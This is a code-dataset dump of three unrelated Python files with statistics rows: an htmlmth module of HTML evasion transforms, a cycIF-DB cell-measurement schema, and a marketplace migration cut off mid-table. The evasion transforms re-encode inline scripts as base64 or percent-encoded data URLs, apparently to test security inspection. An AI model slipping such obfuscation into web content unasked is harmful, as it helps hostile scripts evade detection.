| 44.590058 | 126 | 0.691665 | 21,970 | 207,210 | 6.063268 | 0.012062 | 0.130508 | 0.040072 | 0.062608 | 0.970235 | 0.958336 | 0.950064 | 0.9427 | 0.934622 | 0.92749 | 0 | 0.00289 | 0.246904 | 207,210 | 4,646 | 127 | 44.599656 | 0.850752 | 0.055132 | 0 | 0.893355 | 0 | 0 | 0.004413 | 0.000726 | 0 | 0 | 0 | 0 | 0.085714 | 1 | 0.043854 | false | 0 | 0.004983 | 0.002658 | 0.053821 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28b3c482f994173e4706371ec0d6f6fa5b22cdb7 | 5,067 | py | Python | htmlmth/evasions/html/data_url.py | ZwCreatePhoton/htmlmth | 74d23ca2fa53e11b2587251d2f71c8f275548182 | [
"MIT"
] | null | null | null | htmlmth/evasions/html/data_url.py | ZwCreatePhoton/htmlmth | 74d23ca2fa53e11b2587251d2f71c8f275548182 | [
"MIT"
] | null | null | null | htmlmth/evasions/html/data_url.py | ZwCreatePhoton/htmlmth | 74d23ca2fa53e11b2587251d2f71c8f275548182 | [
"MIT"
] | null | null | null | from . import TransformFunction, string_to_tfarg_function, mime_type_based_transform
import htmlmth.mods.html
# data URLs for script tags (data_url_internal_script_*) requires IE 9+
data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data_no = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (nonstandard base64 declaration, data base64 encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data_no(x))
}))
data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (nonstandard base64 declaration, data base64 encoded, data percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_data(x))
}))
data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_url = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (nonstandard base64 declaration, data base64 encoded, url components percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_nonstd_b64_declare_b64_encode_data_percent_encode_url(x))
}))
data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data_no = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (standard base64 declaration, data base64 encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data_no(x))
}))
data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (standard base64 declaration, data base64 encoded, data percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_data(x))
}))
data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_url = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (standard base64 declaration, data base64 encoded, url components percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_std_b64_declare_b64_encode_data_percent_encode_url(x))
}))
data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data_min = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (no base64 declaration, data partially percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data_min(x))
}))
data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data = TransformFunction("",
"internal scripts changed to external scripts sourced from data urls (no base64 declaration, data percent encoded)",
mime_type_based_transform({
'text/html': string_to_tfarg_function(lambda x: htmlmth.mods.html.data_url_internal_script_url_gen_no_b64_declare_b64_encode_data_percent_encode_data(x))
}))
# TODO: more possible evasions with mime type, charset, BOM ?
| 77.953846 | 204 | 0.64101 | 561 | 5,067 | 5.276292 | 0.096257 | 0.094595 | 0.086149 | 0.120608 | 0.93277 | 0.93277 | 0.93277 | 0.93277 | 0.93277 | 0.932432 | 0 | 0.02664 | 0.311032 | 5,067 | 64 | 205 | 79.171875 | 0.821255 | 0.025459 | 0 | 0.380952 | 0 | 0.095238 | 0.229631 | 0 | 0 | 0 | 0 | 0.015625 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28ec42db734323e2a464bb01c9de4321294e87f5 | 10,388 | py | Python | cycif_db/model/migrate/versions/0001_initial_tables.py | ohsu-comp-bio/cycIF-DB | 57cc27ef09e3cb22d1660a3271ad22994fdf16b9 | [
"MIT"
] | null | null | null | cycif_db/model/migrate/versions/0001_initial_tables.py | ohsu-comp-bio/cycIF-DB | 57cc27ef09e3cb22d1660a3271ad22994fdf16b9 | [
"MIT"
] | null | null | null | cycif_db/model/migrate/versions/0001_initial_tables.py | ohsu-comp-bio/cycIF-DB | 57cc27ef09e3cb22d1660a3271ad22994fdf16b9 | [
"MIT"
] | null | null | null | import logging
from sqlalchemy import (
Column, create_engine, ForeignKey, Index, MetaData, Table, text)
from sqlalchemy.types import (
Boolean,
DateTime,
Integer,
Numeric,
String,
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
log = logging.getLogger(__name__)
Base = declarative_base()
class Sample(Base):
__tablename__ = 'samples'
id = Column(Integer, primary_key=True)
name = Column(String)
cells = relationship('Cell', back_populates='sample')
markers = relationship('Sample_Marker_Association',
back_populates='sample')
def __repr__(self):
return "<Sample(name='{}')>".format(self.name)
Index('ix_sample_name', Sample.name, unique=True)
class Marker(Base):
__tablename__ = 'markers'
id = Column(Integer, primary_key=True)
name = Column(String)
samples = relationship('Sample_Marker_Association',
back_populates='marker')
def __repr__(self):
return "<Marker(name='{}')>".format(self.name)
Index('ix_marker_name', Marker.name, unique=True)
class Sample_Marker_Association(Base):
__tablename__ = 'sample_marker_association'
id = Column(Integer, primary_key=True)
sample_id = Column(Integer, ForeignKey("samples.id", ondelete="CASCADE"))
marker_id = Column(Integer, ForeignKey("markers.id", ondelete="CASCADE"))
channel_number = Column(Integer)
cycle_number = Column(Integer)
sample = relationship("Sample", back_populates="markers")
marker = relationship("Marker", back_populates="samples")
def __repr__(self):
return "<Sample_Marker_Association(sample={}, marker={})>"\
.format(self.sample, self.marker)
Index('ix_sample_marker_associate',
Sample_Marker_Association.sample_id,
Sample_Marker_Association.marker_id,
Sample_Marker_Association.channel_number, unique=True)
class Cell(Base):
__tablename__ = 'cells'
id = Column(Integer, primary_key=True)
sample_id = Column(Integer, ForeignKey("samples.id", ondelete="CASCADE"),
nullable=False)
sample_cell_id = Column(Integer) # local experiment ID
area = Column(Numeric(precision=15, scale=0))
eccentricity = Column(Numeric(precision=15, scale=0))
extent = Column(Numeric(precision=15, scale=0))
majoraxislength = Column(Numeric(precision=15, scale=0))
minoraxislength = Column(Numeric(precision=15, scale=0))
orientation = Column(Numeric(precision=15, scale=0))
solidity = Column(Numeric(precision=15, scale=0))
x_centroid = Column(Numeric(precision=15, scale=0))
y_centroid = Column(Numeric(precision=15, scale=0))
column_centroid = Column(Numeric(precision=15, scale=0))
row_centroid = Column(Numeric(precision=15, scale=0))
alpha_sma__cell_masks = Column(Numeric(precision=15, scale=0))
alpha_sma__nuclei_masks = Column(Numeric(precision=15, scale=0))
ar__cell_masks = Column(Numeric(precision=15, scale=0))
ar__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd11b__cell_masks = Column(Numeric(precision=15, scale=0))
cd11b__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd14__cell_masks = Column(Numeric(precision=15, scale=0))
cd14__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd163__cell_masks = Column(Numeric(precision=15, scale=0))
cd163__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd20__cell_masks = Column(Numeric(precision=15, scale=0))
cd20__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd3__cell_masks = Column(Numeric(precision=15, scale=0))
cd3__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45__cell_masks = Column(Numeric(precision=15, scale=0))
cd45__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45_1__cell_masks = Column(Numeric(precision=15, scale=0))
cd45_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45_2__cell_masks = Column(Numeric(precision=15, scale=0))
cd45_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45r_1__cell_masks = Column(Numeric(precision=15, scale=0))
cd45r_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45r_2__cell_masks = Column(Numeric(precision=15, scale=0))
cd45r_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd45ro__cell_masks = Column(Numeric(precision=15, scale=0))
cd45ro__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd4_1__cell_masks = Column(Numeric(precision=15, scale=0))
cd4_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd4_2__cell_masks = Column(Numeric(precision=15, scale=0))
cd4_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd68__cell_masks = Column(Numeric(precision=15, scale=0))
cd68__nuclei_masks = Column(Numeric(precision=15, scale=0))
cd8a__cell_masks = Column(Numeric(precision=15, scale=0))
cd8a__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck__cell_masks = Column(Numeric(precision=15, scale=0))
ck__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_14_1__cell_masks = Column(Numeric(precision=15, scale=0))
ck_14_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_14_2__cell_masks = Column(Numeric(precision=15, scale=0))
ck_14_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_17__cell_masks = Column(Numeric(precision=15, scale=0))
ck_17__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_19__cell_masks = Column(Numeric(precision=15, scale=0))
ck_19__nuclei_masks = Column(Numeric(precision=15, scale=0))
ck_7__cell_masks = Column(Numeric(precision=15, scale=0))
ck_7__nuclei_masks = Column(Numeric(precision=15, scale=0))
cyclind1__cell_masks = Column(Numeric(precision=15, scale=0))
cyclind1__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_1__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_2__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_2__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_3__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_3__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_4__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_4__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_5__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_5__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_6__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_6__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_7__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_7__nuclei_masks = Column(Numeric(precision=15, scale=0))
dapi_8__cell_masks = Column(Numeric(precision=15, scale=0))
dapi_8__nuclei_masks = Column(Numeric(precision=15, scale=0))
e_cadherin__cell_masks = Column(Numeric(precision=15, scale=0))
e_cadherin__nuclei_masks = Column(Numeric(precision=15, scale=0))
egfr__cell_masks = Column(Numeric(precision=15, scale=0))
egfr__nuclei_masks = Column(Numeric(precision=15, scale=0))
er_alpha__cell_masks = Column(Numeric(precision=15, scale=0))
er_alpha__nuclei_masks = Column(Numeric(precision=15, scale=0))
erk_1__cell_masks = Column(Numeric(precision=15, scale=0))
erk_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
foxp3__cell_masks = Column(Numeric(precision=15, scale=0))
foxp3__nuclei_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af488__cell_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af488__nuclei_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af555__cell_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af555__nuclei_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af647__cell_masks = Column(Numeric(precision=15, scale=0))
goat_igg_af647__nuclei_masks = Column(Numeric(precision=15, scale=0))
granzymeb__cell_masks = Column(Numeric(precision=15, scale=0))
granzymeb__nuclei_masks = Column(Numeric(precision=15, scale=0))
h2a_x__cell_masks = Column(Numeric(precision=15, scale=0))
h2a_x__nuclei_masks = Column(Numeric(precision=15, scale=0))
her2__cell_masks = Column(Numeric(precision=15, scale=0))
her2__nuclei_masks = Column(Numeric(precision=15, scale=0))
hes_1__cell_masks = Column(Numeric(precision=15, scale=0))
hes_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
histone__cell_masks = Column(Numeric(precision=15, scale=0))
histone__nuclei_masks = Column(Numeric(precision=15, scale=0))
hla_a__cell_masks = Column(Numeric(precision=15, scale=0))
hla_a__nuclei_masks = Column(Numeric(precision=15, scale=0))
ki_67__cell_masks = Column(Numeric(precision=15, scale=0))
ki_67__nuclei_masks = Column(Numeric(precision=15, scale=0))
lag_3__cell_masks = Column(Numeric(precision=15, scale=0))
lag_3__nuclei_masks = Column(Numeric(precision=15, scale=0))
p21__cell_masks = Column(Numeric(precision=15, scale=0))
p21__nuclei_masks = Column(Numeric(precision=15, scale=0))
parp__cell_masks = Column(Numeric(precision=15, scale=0))
parp__nuclei_masks = Column(Numeric(precision=15, scale=0))
pd_1__cell_masks = Column(Numeric(precision=15, scale=0))
pd_1__nuclei_masks = Column(Numeric(precision=15, scale=0))
pd_l1__cell_masks = Column(Numeric(precision=15, scale=0))
pd_l1__nuclei_masks = Column(Numeric(precision=15, scale=0))
pr__cell_masks = Column(Numeric(precision=15, scale=0))
pr__nuclei_masks = Column(Numeric(precision=15, scale=0))
rad51__cell_masks = Column(Numeric(precision=15, scale=0))
rad51__nuclei_masks = Column(Numeric(precision=15, scale=0))
rb__cell_masks = Column(Numeric(precision=15, scale=0))
rb__nuclei_masks = Column(Numeric(precision=15, scale=0))
vimentin__cell_masks = Column(Numeric(precision=15, scale=0))
vimentin__nuclei_masks = Column(Numeric(precision=15, scale=0))
sample = relationship("Sample", back_populates="cells")
def __repr__(self):
return "<Cell(sample={}, sample_cell_id={})>"\
.format(self.sample, self.sample_cell_id)
def upgrade(engine):
print(__doc__)
Base.metadata.create_all(engine)
| 47.43379 | 77 | 0.734213 | 1,441 | 10,388 | 4.941013 | 0.094379 | 0.224579 | 0.380056 | 0.414607 | 0.833989 | 0.817135 | 0.767135 | 0.75 | 0.49382 | 0.092697 | 0 | 0.058467 | 0.142183 | 10,388 | 218 | 78 | 47.651376 | 0.740545 | 0.001829 | 0 | 0.054054 | 0 | 0 | 0.036751 | 0.013311 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0 | 0.027027 | 0.021622 | 0.881081 | 0.005405 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a78d012b8c1c397c89704f1e2c8981930fd6099 | 16,974 | py | Python | migrations/versions/99d6d518da65_.py | njugunanduati/soko | 0cebe6e4a71ca12be7674e7a6fa579ff53a6773b | [
"BSD-3-Clause"
] | 1 | 2021-05-06T14:54:20.000Z | 2021-05-06T14:54:20.000Z | migrations/versions/99d6d518da65_.py | njugunanduati/soko | 0cebe6e4a71ca12be7674e7a6fa579ff53a6773b | [
"BSD-3-Clause"
] | null | null | null | migrations/versions/99d6d518da65_.py | njugunanduati/soko | 0cebe6e4a71ca12be7674e7a6fa579ff53a6773b | [
"BSD-3-Clause"
] | 1 | 2021-05-06T14:55:19.000Z | 2021-05-06T14:55:19.000Z | """empty message
Revision ID: 99d6d518da65
Revises: None
Create Date: 2017-05-11 20:18:26.927921
"""
# revision identifiers, used by Alembic.
revision = '99d6d518da65'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('counties',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('locations',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user', sa.Integer(), nullable=False),
sa.Column('latitude', sa.String(length=150), nullable=False),
sa.Column('longitude', sa.String(length=150), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_categories',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('email', sa.String(length=80), nullable=False),
sa.Column('password', sa.String(length=128), nullable=True),
sa.Column('password_reset', sa.Integer(), nullable=True),
sa.Column('first_name', sa.String(length=30), nullable=True),
sa.Column('last_name', sa.String(length=30), nullable=True),
sa.Column('phone_number', sa.String(length=15), nullable=True),
sa.Column('profile_photo', sa.String(length=150), nullable=True),
sa.Column('category', sa.String(length=30), nullable=True),
sa.Column('user_type', sa.String(length=80), nullable=True),
sa.Column('business_name', sa.String(length=300), nullable=True),
sa.Column('business_branch', sa.String(length=300), nullable=True),
sa.Column('active', sa.Boolean(), nullable=True),
sa.Column('is_admin', sa.Boolean(), nullable=True),
sa.Column('token', sa.String(length=100), nullable=False),
sa.Column('photo', sa.String(length=300), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.Column('region', sa.String(length=80), nullable=True),
sa.Column('lat', sa.String(length=80), nullable=True),
sa.Column('lng', sa.String(length=80), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('email')
)
op.create_table('variables',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('cost_per_km_normal_time', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('cost_per_km_peak_time', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('cost_per_km_scheduled', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('cost_waiting_time', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('vehicle_Type',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=30), nullable=False),
sa.Column('make', sa.String(length=30), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('documents',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('filename', sa.String(length=256), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('farmer_address',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('primary_address', sa.String(length=300), nullable=False),
sa.Column('location', sa.String(length=80), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('loans',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('due_on', sa.DateTime(), nullable=False),
sa.Column('paid_on', sa.DateTime(), nullable=True),
sa.Column('total', sa.Integer(), nullable=True),
sa.Column('paid', sa.Integer(), nullable=True),
sa.Column('status', sa.Integer(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('orders',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('consumer', sa.String(length=120), nullable=True),
sa.Column('order_date', sa.DateTime(), nullable=False),
sa.Column('status', sa.Enum('Accepted', 'Delivered', 'Pending', name='order_status'), nullable=False),
sa.Column('lat', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('lng', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_types',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('product_category_id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_category_id'], ['product_categories.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('roles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('transporter_current_location',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('latitude', sa.String(length=80), nullable=True),
sa.Column('longitude', sa.String(length=80), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('transporter_ratings',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('rating', sa.Integer(), nullable=False),
sa.Column('review', sa.String(length=80), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('transporters',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('vehicle_type', sa.String(length=80), nullable=False),
sa.Column('vehicle_reg_no', sa.String(length=80), nullable=False),
sa.Column('vehicle_color', sa.String(length=80), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('vehicle_color')
)
op.create_table('vehicles',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('number', sa.String(length=30), nullable=True),
sa.Column('type_id', sa.Integer(), nullable=False),
sa.Column('colour', sa.String(length=30), nullable=True),
sa.Column('expiry_date', sa.DateTime(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['type_id'], ['vehicle_Type.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('colour'),
sa.UniqueConstraint('number')
)
op.create_table('earnings',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('order_id', sa.Integer(), nullable=False),
sa.Column('total', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['order_id'], ['orders.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('payments',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('order_id', sa.Integer(), nullable=False),
sa.Column('payment_method', sa.Enum('Cheque', 'Cash', 'M-pesa', 'Debit Card', 'Credit Card', name='payment_method'), nullable=False),
sa.Column('amount', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['order_id'], ['orders.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_sub_types',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('description', sa.String(length=500), nullable=False),
sa.Column('product_category_id', sa.Integer(), nullable=False),
sa.Column('product_type_id', sa.Integer(), nullable=False),
sa.Column('photo', sa.String(length=500), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_category_id'], ['product_categories.id'], ),
sa.ForeignKeyConstraint(['product_type_id'], ['product_types.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('trips',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('order_id', sa.Integer(), nullable=False),
sa.Column('status', sa.Enum('Accepted', 'Rejected', 'Started', 'Finished', 'Pending', name='trip_status'), nullable=False),
sa.Column('lat', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('lng', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['order_id'], ['orders.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('products',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('product_category_id', sa.Integer(), nullable=False),
sa.Column('product_type_id', sa.Integer(), nullable=False),
sa.Column('product_sub_type_id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('description', sa.String(length=500), nullable=False),
sa.Column('packaging', sa.String(length=80), nullable=False),
sa.Column('price', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('photo', sa.String(length=500), nullable=False),
sa.Column('lat', sa.Numeric(precision=9, scale=6), nullable=True),
sa.Column('lng', sa.Numeric(precision=9, scale=6), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_category_id'], ['product_categories.id'], ),
sa.ForeignKeyConstraint(['product_sub_type_id'], ['product_sub_types.id'], ),
sa.ForeignKeyConstraint(['product_type_id'], ['product_types.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('cart',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('user', sa.Integer(), nullable=False),
sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('total', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('deliveries',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('quantity', sa.Integer(), nullable=False),
sa.Column('purchase_date', sa.DateTime(), nullable=False),
sa.Column('transporter', sa.Integer(), nullable=False),
sa.Column('status', sa.Enum('Accepted', 'Delivered', 'Pending', name='status_delivery'), nullable=False),
sa.Column('lat', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('lng', sa.Numeric(precision=9, scale=6), nullable=False),
sa.Column('total', sa.Numeric(precision=15, scale=2), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('farmers',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('id_number', sa.Integer(), nullable=True),
sa.Column('photo', sa.String(length=80), nullable=True),
sa.Column('product_id', sa.Integer(), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('product_ratings',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('rating', sa.Integer(), nullable=False),
sa.Column('review', sa.String(length=80), nullable=True),
sa.Column('created_at', sa.DateTime(), nullable=False),
sa.ForeignKeyConstraint(['product_id'], ['products.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('purchases',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('product_id', sa.Integer(), nullable=False),
sa.Column('user', sa.Integer(), nullable=False),
